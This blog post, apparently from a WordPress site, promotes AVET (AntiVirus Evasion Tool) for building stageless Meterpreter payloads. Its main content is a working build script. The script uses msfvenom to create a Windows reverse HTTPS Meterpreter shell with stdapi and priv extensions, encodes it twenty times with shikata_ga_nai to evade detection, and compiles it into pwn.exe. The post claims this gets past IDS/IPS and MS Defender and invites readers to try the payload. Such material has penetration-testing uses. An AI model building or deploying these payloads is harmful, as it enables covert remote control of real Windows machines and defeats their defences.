AVET and unstaged payloads

There are several reasons for using unstaged payloads for meterpreter. Since the dlls are not loaded over the network, but are included in the executable file, this may reduce the chance for an IDS/IPS to detect the connection. The executable will be much bigger:

# ls -al pwn_unstaged.exe
-rwxr-xr-x 1 root root 1578548 May 6 11:05 pwn_unstaged.exe
# ls pwn_staged.exe -al
-rwxr-xr-x 1 root root 120884 May 6 11:33 pwn_staged.exe

For more information about unstaged meterpreter connections: https://community.rapid7.com/community/metasploit/blog/2015/03/25/stageless-meterpreter-payloads
Here is the build script for the unstaged payload (name: build_win32_meterpreter_unstaged_rev_https_20xshikata.sh):

# simple example script for building the .exe file
# include script containing the compiler var $win32_compiler
# you can edit the compiler in build/global_win32.sh
# or enter $win32_compiler="mycompiler" here
. build/global_win32.sh
# make meterpreter unstaged reverse payload, encoded 20 rounds with shikata_ga_nai
msfvenom -p windows/meterpreter_reverse_https lhost= lport=443 extensions=stdapi,priv -e x86/shikata_ga_nai -i 20 -f c -a x86 --platform Windows > sc.txt
# call make_avet, the sandbox escape is due to the many rounds of decoding the shellcode
./make_avet -f sc.txt
# compile to pwn.exe file
$win32_compiler -o pwn.exe avet.c
# cleanup
echo "" > defs.h

And execution (on Windows 7, MS Defender):

Try the new payload and grab your copy of AVET (AntiVirus Evasion Tool):



One thought on “AVET and unstaged payloads

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s